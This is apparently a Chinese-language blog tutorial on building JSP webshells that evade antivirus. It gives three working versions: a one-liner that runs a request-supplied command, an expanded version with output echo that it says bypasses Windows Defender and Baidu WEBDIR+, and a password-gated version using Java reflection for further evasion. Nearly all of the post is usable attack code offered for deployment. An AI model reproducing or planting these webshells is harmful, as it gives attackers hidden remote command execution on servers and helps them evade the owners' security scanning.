从一句话开始
首先从一句话角度来做,给出JSP的一句话
这个Webshell是会直接被Windows Defender杀的,百度WEBDIR+也会杀
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
尝试拆开一句话,再加入回显和消除乱码,得到这样的代码
<%@ page language="java" pageEncoding="UTF-8" %><%Runtime rt = Runtime.getRuntime();String cmd = request.getParameter("cmd");Process process = rt.exec(cmd);java.io.InputStream in = process.getInputStream();// 回显out.print("<pre>");// 网上流传的回显代码略有问题,建议采用这种方式java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);String s = null;while ((s = stdInput.readLine()) != null) {out.println(s);}out.print("</pre>");%>
绕过了Windows Defender和百度WEBDIR+
然而我们不能满足于当前的情况,因为这些平台的查杀力度并不是很强
再这个基础上,可以加入反射调用来做进一步的免杀
<%@ page language="java" pageEncoding="UTF-8" %><%// 加入一个密码String PASSWORD = "password";String passwd = request.getParameter("pwd");String cmd = request.getParameter("cmd");if (!passwd.equals(PASSWORD)) {return;}// 反射调用Class rt = Class.forName("java.lang.Runtime");java.lang.reflect.Method gr = rt.getMethod("getRuntime");java.lang.reflect.Method ex = rt.getMethod("exec", String.class);Process process = (Process) ex.invoke(gr.invoke(null), cmd);// 类似上文做回显java.io.InputStream in = process.getInputStream();out.print("<pre>");java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);String s = null;while ((s = stdInput.readLine()) != null) {out.println(s);}out.print("</pre>");%>
若有收获,就点个赞吧
0 人点赞
